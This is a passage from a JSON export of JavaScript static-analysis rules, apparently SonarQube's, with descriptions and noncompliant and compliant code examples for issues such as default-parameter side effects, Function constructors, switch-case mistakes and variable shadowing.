Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3509","repo":"javascript","name":"Default parameters should not cause side effects","htmlDesc":"<p>The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar count = 0;\n\nfunction go(i = count++) {  \/\/ Noncompliant\n  console.log(i);\n}\n\ngo();  \/\/ outputs 0\ngo(7); \/\/ outputs 7\ngo();  \/\/ outputs 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3513","repo":"javascript","name":"\"arguments\" should not be accessed directly","htmlDesc":"<p>The magic of JavaScript is that you can pass arguments to functions that don't declare parameters, and on the other side, you can use those\npassed-in arguments inside the no-args <code>function<\/code>. 
<\/p>\n<p>But just because you can, that doesn't mean you should. The expectation and use of arguments inside functions that don't explicitly declare them is\nconfusing to callers. No one should ever have to read and fully understand a function to be able to use it competently. <\/p>\n<p>If you don't want to name arguments explicitly, use the <code>...<\/code> syntax to specify that a variable number of arguments is expected. Then\ninside the function, you'll be dealing with a first-class array, rather than an array-like structure.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction concatenate() {\n  let args = Array.prototype.slice.call(arguments);  \/\/ Noncompliant\n  return args.join(', ');\n}\n\nfunction doSomething(isTrue) {\n  var args = Array.prototype.slice.call(arguments, 1); \/\/ Noncompliant\n  if (!isTrue) {\n    for (var arg of args) {\n      ...\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction concatenate(...args) {\n  return args.join(', ');\n}\n\nfunction doSomething(isTrue, ...values) {\n  if (!isTrue) {\n    for (var value of values) {\n      ...\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3514","repo":"javascript","name":"Destructuring syntax should be used for assignments","htmlDesc":"<p>ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called\n\"destructuring\", and it allows you to condense boilerplate code so you can concentrate on logic. 
<\/p>\n<p>This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n  var a = obj1.a;  \/\/ Noncompliant\n  var b = obj1.b;\n\n  var name = obj2.name;  \/\/ ignored; there's only one extraction-and-assignment\n\n  var zero = array[0];  \/\/ Noncompliant\n  var one = array[1];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n  var {a, b} = obj1;\n\n  var {name} = obj2;  \/\/ this syntax works because var name and property name are the same\n\n  var [zero, one] = array;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3516","repo":"javascript","name":"Function returns should not be invariant","htmlDesc":"<p>When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.<\/p>\n<p>This rule raises an issue when a function contains several <code>return<\/code> statements that all return the same value.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(a) {  \/\/ Noncompliant\n  let b = 12;\n  if (a) {\n    return b;\n  }\n  return b;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3523","repo":"javascript","name":"Function constructors should not be used","htmlDesc":"<p>In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructor's string\narguments the way <code>eval<\/code> does, which can expose your program to arbitrary, unintended code (a code injection if any part of the string is attacker-controlled) and is both slow and a security\nrisk.<\/p>\n<p>In general it is better to avoid it altogether, particularly when used to parse 
JSON data. You should use ECMAScript 5's built-in JSON functions or\na dedicated library.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar obj =  new Function(\"return \" + data)();  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = JSON.parse(data);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Function calls where the argument is a string literal (e.g. <code>(Function('return this'))()<\/code>) are ignored. <\/p>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S3524","repo":"javascript","name":"Braces and parentheses should be used consistently with arrow functions","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does\nnot conform to the configured requirements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the configured defaults forbidding parentheses<\/p>\n<pre>\nvar foo = (a) =&gt; { \/* ... *\/ };  \/\/ Noncompliant; remove parens from arg\nvar bar = (a, b) =&gt; { return 0; };  \/\/ Noncompliant; remove curly braces from body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar foo = a =&gt; { \/* ... *\/ };\nvar bar = (a, b) =&gt; 0;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[{"key":"body_braces","htmlDesc":"True to require curly braces around function body. False to forbid them for single-return bodies.","defaultValue":"false","type":"BOOLEAN"},{"key":"parameter_parens","htmlDesc":"True to require parentheses around parameters. 
False to forbid them for a single parameter.","defaultValue":"false","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"javascript:S3525","repo":"javascript","name":"Class methods should be used instead of \"prototype\" assignments","htmlDesc":"<p>Originally JavaScript didn't support <code>class<\/code>es, and class-like behavior had to be kludged using things like <code>prototype<\/code>\nassignments for \"class\" functions. Fortunately, ECMAScript 2015 added classes, so any lingering <code>prototype<\/code> uses should be converted to\ntrue <code>class<\/code>es. The new syntax is more expressive and clearer, especially to those with experience in other languages.<\/p>\n<p>Specifically, with ES2015, you should simply declare a <code>class<\/code> and define its methods inside the class declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyNonClass(initializerArgs = []) {\n  this._values = [...initializerArgs];\n}\n\nMyNonClass.prototype.doSomething = function () {  \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n  constructor(initializerArgs = []) {\n    this._values = [...initializerArgs];\n  }\n\n  doSomething() {\n    \/\/...\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3533","repo":"javascript","name":"\"import\" should be used to include external code","htmlDesc":"<p>Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. 
Fortunately,\nES2015 provides language-standard mechanisms for module management, <code>import<\/code> and <code>export<\/code>, and older usages should be\nconverted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ circle.js\nexports.area = function (r) {\n  return Math.PI * r * r;\n};\n\n\/\/ foo.js\ndefine([\".\/cart\", \".\/horse\"], function(cart, horse) {  \/\/ Noncompliant\n  \/\/ ...\n});\n\n\/\/ bar.js\nconst circle = require('.\/circle.js');  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ circle.js\nlet area = function (r) {\n  return Math.PI * r * r;\n}\nexport default area;\n\n\/\/ foo.js\nimport cart from \".\/cart.js\";\nimport horse from \".\/horse.js\";\n\n\/\/ bar.js\nimport circle from \".\/circle.js\"\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3579","repo":"javascript","name":"Array indexes should be numeric","htmlDesc":"<p>JavaScript is flexible enough to allow you to store values in an array with either numeric or named indexes. That is, it supports associative\narrays. But creating and populating an object in JavaScript is just as easy as an array, and more reliable if you need named members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob';  \/\/ Noncompliant\narr[1] = 'foo';\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet obj = {\n  name: 'bob',\n  arr: ['a', 'foo']\n};\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3616","repo":"javascript","name":"Comma and logical OR operators should not be used in switch cases","htmlDesc":"<p>The comma operator (<code>,<\/code>) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a <code>switch<\/code> <code>case<\/code>. 
You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will not match any case and will end up in the <code>default<\/code> clause.<\/p>\n<p>Similarly, the logical OR operator (<code>||<\/code>) does not work in a <code>switch<\/code> <code>case<\/code>: the expression is evaluated to a single value (its first truthy operand), and only that value is ever matched.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (a) {\n  case 1,2:  \/\/ Noncompliant; only 2 is ever handled by this case\n    doTheThing(a);\n    break;\n  case 3 || 4: \/\/ Noncompliant; only '3' is handled\n    doThatThing(a);\n    break;\n  case 5:\n    doTheOtherThing(a);\n    break;\n  default:\n    console.log(\"Neener, neener!\");  \/\/ this happens when a==1 or a == 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (a) {\n  case 1:\n  case 2:\n    doTheThing(a);\n    break;\n  case 3:\n  case 4:\n    doThatThing(a);\n    break;\n  case 5:\n    doTheOtherThing(a);\n    break;\n  default:\n    console.log(\"Neener, neener!\");\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3686","repo":"javascript","name":"Functions should not be called both with and without \"new\"","htmlDesc":"<p>Constructor functions, which create new object instances, must only be called with <code>new<\/code>. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getNum() {\n  return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n  this.numeric = numeric;\n  this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum();  \/\/ Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num();  \/\/ Noncompliant. 
undefined is returned, NOT an object\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3699","repo":"javascript","name":"The output of functions that don't return anything should not be used","htmlDesc":"<p>If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n\"result\" to a variable is probably a bug because such functions return <code>undefined<\/code>, which is probably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n}\n\na = foo();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo() {\n}\n\nfoo();\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3735","repo":"javascript","name":"\"void\" should not be used","htmlDesc":"<p>The <code>void<\/code> operator evaluates its argument and unconditionally returns <code>undefined<\/code>. It can be useful in pre-ECMAScript 5\nenvironments, where <code>undefined<\/code> could be reassigned, but generally, its use makes code harder to understand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid (function() {\n   ...\n}());\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n(function() {\n   ...\n}());\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>void 0<\/code> is used in place of <code>undefined<\/code>. <\/p>\n<pre>\nif (parameter === void 0) {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3758","repo":"javascript","name":"Values not convertible to numbers should not be used in numeric comparisons","htmlDesc":"<p>In a Zen-like manner, <code>NaN<\/code> isn't equal to anything, even itself. So comparisons (<code>&gt;, &lt;, &gt;=, &lt;=<\/code>) where one\noperand is <code>NaN<\/code> or evaluates to <code>NaN<\/code> always return <code>false<\/code>. 
Specifically, <code>undefined<\/code> and objects that\ncannot be converted to numbers evaluate to <code>NaN<\/code> when used in numerical comparisons.<\/p>\n<p>This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is <code>NaN<\/code>,\n<code>undefined<\/code> or an <code>Object<\/code> which cannot be converted to a number.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x;  \/\/ x is currently \"undefined\"\nif (someCondition()) {\n  x = 42;\n}\n\nif (42 &gt; x) {  \/\/ Noncompliant; \"x\" might still be \"undefined\"\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj &gt; 24) { \/\/ Noncompliant\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x;\nif (someCondition()) {\n  x = 42;\n} else {\n  x = foo();\n}\n\nif (42 &gt; x) {\n  doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop &gt; 24) {\n  doSomething();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3776","repo":"javascript","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S3782","repo":"javascript","name":"Arguments to built-in functions should match documented types","htmlDesc":"<p>The types of the arguments to built-in functions are specified in the JavaScript language specifications. 
Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return <code>false<\/code>).<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x &lt; 0.0042);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x) &lt; 0.0042;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3785","repo":"javascript","name":"\"in\" should not be used with primitive types","htmlDesc":"<p>The <code>in<\/code> operator tests whether the specified property is in the specified object.<\/p>\n<p>If the right operand is of a primitive type (i.e., not an object) the <code>in<\/code> operator raises a <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = \"Foo\";\n\"length\" in x; \/\/ Noncompliant: TypeError\n0 in x;        \/\/ Noncompliant: TypeError\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = new String(\"Foo\");\n\"length\" in x;    \/\/ true\n0 in x;           \/\/ true\n\"foobar\" in x;    \/\/ false\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3786","repo":"javascript","name":"Template literal placeholder syntax should not be used in regular strings","htmlDesc":"<p>JavaScript allows developers to embed variables or expressions in strings using template literals, instead of string concatenation. 
This is done by\nusing expressions like <code>${variable} <\/code> in a string between two back-ticks (<code>`<\/code>).<\/p>\n<p>When used in a regular string literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is\nprobably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(\"Today is ${date}\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconsole.log(`Today is ${date}`);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3796","repo":"javascript","name":"Callbacks of array methods should have return statements","htmlDesc":"<p>Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.<\/p>\n<p>This rule applies for the following methods of an array:<\/p>\n<ul>\n  <li> <code>Array.from<\/code> <\/li>\n  <li> <code>Array.prototype.every<\/code> <\/li>\n  <li> <code>Array.prototype.filter<\/code> <\/li>\n  <li> <code>Array.prototype.find<\/code> <\/li>\n  <li> <code>Array.prototype.findIndex<\/code> <\/li>\n  <li> <code>Array.prototype.map<\/code> <\/li>\n  <li> <code>Array.prototype.reduce<\/code> <\/li>\n  <li> <code>Array.prototype.reduceRight<\/code> <\/li>\n  <li> <code>Array.prototype.some<\/code> <\/li>\n  <li> <code>Array.prototype.sort<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n  a.concat(b);\n}); \/\/ Noncompliant: No return statement\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n  return a.concat(b);\n});\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3799","repo":"javascript","name":"Destructuring patterns should not be empty","htmlDesc":"<p>Destructuring is a convenient way of 
extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name, most of the time the\nintent was to use a default value instead.<\/p>\n<p>This rule raises an issue when an empty destructuring pattern is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar {a: {}, b} = myObj; \/\/ Noncompliant\nfunction foo({first: [], second}) { \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3828","repo":"javascript","name":"\"yield\" expressions should not be used outside generators","htmlDesc":"<p>The <code>yield<\/code> keyword is used in a generator function to return an <code>IteratorResult<\/code> to the caller. It has no other purpose, and\noutside such a function it is not a keyword at all: it is parsed as a plain identifier (a reserved word in strict mode), so a statement like <code>yield i * 2<\/code> is a <code>SyntaxError<\/code> rather than a generator step.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n  for (var i = 0; i &lt; 5; i++) {\n    yield i * 2;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction * foo() {\n  for (var i = 0; i &lt; 5; i++) {\n    yield i * 2;\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3834","repo":"javascript","name":"\"Symbol\" should not be used as a constructor","htmlDesc":"<p><code>Symbol<\/code> is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.<\/p>\n<p>An instance can only be created by using <code>Symbol<\/code> as a function. 
Using <code>Symbol<\/code> with the <code>new<\/code> operator will raise\na <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst sym = new Symbol(\"foo\");   \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst sym = Symbol(\"foo\");\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3854","repo":"javascript","name":"super() should be invoked appropriately","htmlDesc":"<p>There are situations where <code>super()<\/code> must be invoked and situations where <code>super()<\/code> cannot be invoked.<\/p>\n<p>The basic rule is: a constructor in a non-derived class cannot invoke <code>super()<\/code>; a constructor in a derived class must invoke\n<code>super()<\/code>.<\/p>\n<p>Furthermore:<\/p>\n<p>- <code>super()<\/code> must be invoked before the <code>this<\/code> and <code>super<\/code> keywords can be used.<\/p>\n<p>- <code>super()<\/code> must be invoked with the same number of arguments as the base class' constructor.<\/p>\n<p>- <code>super()<\/code> can only be invoked in a constructor - not in any other method.<\/p>\n<p>- <code>super()<\/code> cannot be invoked multiple times in the same constructor.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Animal {\n  constructor() {\n    super();         \/\/ Noncompliant, super() cannot be invoked in a base class\n  }\n\n  doSomething() {\n  }\n}\n\nclass Dog extends Animal {\n  constructor(name) {\n    this.name = name;\n    super.doSomething();\n    super();         \/\/ Noncompliant, super() must be invoked before \"this\" or \"super\" is used\n  }\n\n  doSomething() {\n    super();         \/\/ Noncompliant, super() cannot be invoked outside of a constructor\n  }\n}\n\nclass Labrador extends Dog {\n  constructor(name) {\n    super();         \/\/ Noncompliant, super() must be invoked with one argument\n  }\n}\n\nclass GermanShepherd extends Dog {\n  constructor(name) {\n  }                  \/\/ 
Noncompliant, super() must be invoked in constructor of derived class\n}\n\nclass FilaBrasileiro extends Dog {\n  constructor(name) {\n    super(name);\n    super(name);    \/\/ Noncompliant, super() can only be invoked once\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Animal {\n  constructor() {\n  }\n\n  doSomething() {\n  }\n}\n\nclass Dog extends Animal {\n  constructor(name) {\n    super();\n    this.name = name;\n    super.doSomething();\n  }\n\n  doSomething() {\n  }\n}\n\nclass Labrador extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n\nclass GermanShepherd extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n\nclass FilaBrasileiro extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n<\/pre>\n<h2>Known Limitations<\/h2>\n<ul>\n  <li>False negatives: some issues are not raised if the base class is not defined in the same file as the current class.<\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3923","repo":"javascript","name":"All branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having all branches in a <code>switch<\/code> or <code>if<\/code> chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a <code>switch<\/code>\/<code>if<\/code> chain at all. Note that this rule does not\napply to <code>if<\/code> chains without <code>else<\/code>s, or to <code>switch<\/code>es without <code>default<\/code> clauses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (b == 0) {  \/\/ Noncompliant\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing();\n}\n\nlet a = (b == 0) ? 
getValue() : getValue();   \/\/ Noncompliant\n\nswitch (i) {  \/\/ Noncompliant\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomething();\n    break;\n  case 3:\n    doSomething();\n    break;\n  default:\n    doSomething();\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S888","repo":"javascript","name":"Equality operators should not be used in \"for\" loop termination conditions","htmlDesc":"<p>Testing <code>for<\/code> loop termination using an equality operator (<code>==<\/code> and <code>!=<\/code>) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 1; i != 10; i += 2)  \/\/ Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 1; i &lt;= 10; i += 2)  \/\/ Compliant\n{\n  \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Equality operators are ignored if the loop counter is not modified within the body of the loop and either:<\/p>\n<ul>\n  <li> starts below the ending value and is incremented by 1 on each iteration. <\/li>\n  <li> starts above the ending value and is decremented by 1 on each iteration. 
<\/li>\n<\/ul>\n<p>Equality operators are also ignored when the test is against <code>null<\/code>.<\/p>\n<pre>\nfor (var i = 0; arr[i] != null; i++) {\n  \/\/ ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n  \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 6-5-2 <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/835\">MITRE, CWE-835<\/a> - Loop with Unreachable Exit Condition ('Infinite Loop') <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwDJAQ\">CERT, MSC21-C.<\/a> - Use robust loop termination conditions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/GwDJAQ\">CERT, MSC21-CPP.<\/a> - Use inequality to terminate a loop whose counter changes\n  by more than one <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:StrictMode","repo":"javascript","name":"\"strict\" mode should be used with caution","htmlDesc":"<p>Even though it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction strict() {\n  'use strict';\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:SwitchWithoutDefault","repo":"javascript","name":"\"switch\" statements should end with \"default\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. 
The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (param) {  \/\/missing default clause\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n}\n\nswitch (param) {\n  default: \/\/ default clause should be the last one\n    error();\n    break;\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (param) {\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n  default:\n    error();\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n  <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n  <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n  <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:UnusedVariable","repo":"javascript","name":"Unused local variables and functions should be removed","htmlDesc":"<p>If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability\nbecause developers will not wonder what the variable or function is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n  var seconds = 0;   \/\/ seconds is never used\n  return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n  return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:VariableShadowing","repo":"javascript","name":"Variables should not be shadowed","htmlDesc":"<p>Overriding a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of code.\nFurther, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nshow: function(point, element) {\n  if (!this.drops.length) return;\n  var drop, affected = [];\n  this.drops.each( function(drop) {  \/\/ Non-Compliant; defines a new 'drop' parameter\n    if(Droppables.isAffected(point, element, drop))\n      affected.push(drop);\n  });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nshow: function(point, element) {\n  if (!this.drops.length) return;\n  var drop, affected = [];\n  this.drops.each( function(aDrop) {\n    if(Droppables.isAffected(point, element, aDrop))\n      affected.push(aDrop);\n  });\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 5.2 - Identifiers in an inner scope shall not use the same name as an identifier in an outer scope, and therefore hide that\n  identifier 
